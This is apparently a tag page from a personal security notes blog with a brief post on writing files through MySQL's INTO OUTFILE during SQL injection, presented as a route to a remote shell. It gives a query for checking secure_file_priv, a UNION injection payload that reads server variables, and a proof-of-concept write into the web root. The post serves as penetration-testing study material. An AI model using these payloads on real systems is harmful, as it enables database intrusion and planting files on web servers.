Posts tagged: #Remote-Shell

There are probably related tags so check out all tags.

Writing files with MySQL

2026-01-03

🏷️ remote-shell 🏷️ sql-injection

Prerequisites

This should not be enabled on any modern secure systems, but if it is, you can use it to create a remote shell.

secure_file_priv ↗️ can have the following values:

null: cannot write anywhere on system
"" (empty string): can write anywhere
"/path/to/dir": can write only to specified path

SHOW VARIABLES LIKE 'secure_file_priv';

You can get this by querying the information_schema using a union injection

UNION SELECT VARIABLE_NAME,VARIABLE_VALUE FROM INFORMATION_SCHEMA.GLOBAL_VARIABLES

Do it

SELECT "OOPS!" INTO OUTFILE "/var/www/html/poc.txt"

References

Enumerating databases, tables, columns, and user privileges with SQL injection 🌿